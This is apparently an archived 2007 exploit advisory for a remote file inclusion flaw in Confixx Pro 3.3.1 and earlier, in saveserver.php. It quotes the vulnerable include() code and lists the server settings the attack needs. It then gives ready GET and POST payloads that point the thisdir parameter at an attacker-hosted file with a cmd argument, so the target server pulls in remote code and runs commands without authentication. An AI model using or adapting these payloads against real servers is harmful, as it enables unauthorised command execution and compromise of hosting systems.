Confixx Pro <= 3.3.1 (saveserver.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Confixx Pro <= 3.3.1 (saveserver.php) Remote File Inclusion Vulnerability
# Published : 2007-07-24
# Author : H4 / XPK
# Previous Title : IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
# Next Title : Entertainment CMS (Local Inclusion) Remote Command Execution Exploit

[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
__________________________________________________________________________

[!] Application homepage :   http://www.swsoft.com/de/products/confixx/
[!] Author               :   H4 / XPK
[!] Contact              :   http://xpkzxc.com/
[!] Bug discovered       :   2007-07-21
[!] Bug published        :   2007-07-24
[!] Risk                 :   Moderate

Do not forget visit our page for new vulnerabilites , information and tools.

---------------------------------------------------------------------

Vuln. code: admin/business_inc/saveserver.php

Lines 8-11

if( !in_array($returnto, $actions) )
{
        include( $thisdir . "/business_inc/list.php" );
}

Variable $thisdir is not defined ...

---------------------------------------------------------------------

An attacker does not need to be authenticated to access this file.

[!] Conditions: open_basedir restriction off and allow_url_fopen = on

[!] Exploitation : http://[target]/admin/business_inc/saveserver.php

Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la

---------------------------------------------------------------------

# www.Syue.com [2007-07-24]